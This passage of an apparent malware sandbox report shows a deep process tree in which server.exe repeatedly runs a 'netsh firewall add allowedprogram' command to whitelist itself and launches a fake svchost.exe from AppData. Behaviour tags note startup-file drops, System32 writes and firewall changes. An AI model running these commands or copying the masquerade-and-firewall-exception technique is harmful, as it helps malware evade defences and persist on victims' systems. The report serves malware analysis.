C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE40⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"40⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"41⤵
- Drops startup file
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE42⤵
- Modifies Windows Firewall
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"43⤵
- Drops startup file
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE44⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"45⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE46⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"47⤵
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE48⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"49⤵
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE50⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"51⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE52⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"53⤵
- Drops startup file
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE54⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"54⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"55⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE56⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"56⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"57⤵
- Drops startup file
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE58⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"59⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE60⤵
- Modifies Windows Firewall
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"61⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE62⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"62⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"63⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE64⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"64⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"65⤵
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE66⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"66⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"67⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE68⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"68⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"69⤵
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE70⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"70⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"71⤵
- Drops startup file
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE72⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"72⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"73⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE74⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"74⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"75⤵
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE76⤵
- Modifies Windows Firewall
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"76⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"77⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE78⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"78⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"79⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE80⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"80⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"81⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE82⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"82⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"83⤵
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE84⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"84⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"85⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE86⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"86⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"87⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE88⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"88⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"89⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE90⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"90⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"91⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE92⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"92⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"93⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE94⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"94⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"95⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE96⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"96⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"97⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE98⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"98⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"99⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE100⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"100⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"101⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE102⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"102⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"103⤵
- Drops startup file
- Drops file in System32 directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE104⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"104⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"105⤵
- Drops startup file
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE106⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"106⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"107⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE108⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"108⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"109⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE110⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"110⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"111⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE112⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"112⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"113⤵
- Drops startup file
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE114⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"114⤵
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"115⤵
- Drops startup file
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE116⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"116⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"117⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE118⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"118⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"119⤵
- Drops startup file
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE120⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"120⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"121⤵
- Drops startup file
- Drops file in System32 directory
- Drops file in Program Files directory
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-